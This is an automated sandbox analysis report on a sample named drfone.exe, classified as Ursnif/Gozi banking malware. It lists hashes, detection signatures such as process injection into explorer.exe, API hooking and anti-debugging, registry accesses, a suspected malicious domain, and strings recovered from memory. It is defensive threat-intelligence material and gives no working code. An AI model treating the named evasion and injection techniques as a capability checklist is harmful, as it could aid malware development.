Analysis Report drfone.exe

Overview

General Information

Sample Name: drfone.exe
Analysis ID: 333865
MD5: 545f38fbb74881142712052a5b6eabce
SHA1: 4cbaf1ecb48629b163f4387605c8a9011e89183c
SHA256: 7b8ef3f064d0de0c27d56ff4df7d360f0d546d32aabbdf96a746bab5c84277ec
Tags: gozi isfb OOONovasoft signed ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Compiles code for process injection (via .Net compiler)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates a COM Internet Explorer object
Encrypted powershell cmdline option found
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Suspicious Csc.exe Source File Folder
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: drfone.exe ReversingLabs: Detection: 14%
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.drfone.exe.610000.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.drfone.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: C:\Windows\explorer.exe Code function: 39_2_02DB2F10 FindFirstFileW,FindNextFileW,FindClose, 39_2_02DB2F10

Networking:

Creates a COM Internet Explorer object
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: C:\Users\user\Desktop\drfone.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDSOLUTIONSRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View JA3 fingerprint: 8916410db85077a5460817142dcbc8de
Source: unknown DNS traffic detected: queries for: hapynewyear.xyz
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000027.00000000.499661832.000000000E220000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000027.00000000.499661832.000000000E220000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: msapplication.xml.5.dr String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000020.00000002.509231908.00000276C608F000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000027.00000002.716897951.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: msapplication.xml1.5.dr String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: msapplication.xml2.5.dr String found in binary or memory: http://www.live.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: msapplication.xml3.5.dr String found in binary or memory: http://www.nytimes.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: msapplication.xml4.5.dr String found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: msapplication.xml5.5.dr String found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: msapplication.xml6.5.dr String found in binary or memory: http://www.wikipedia.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: msapplication.xml7.5.dr String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
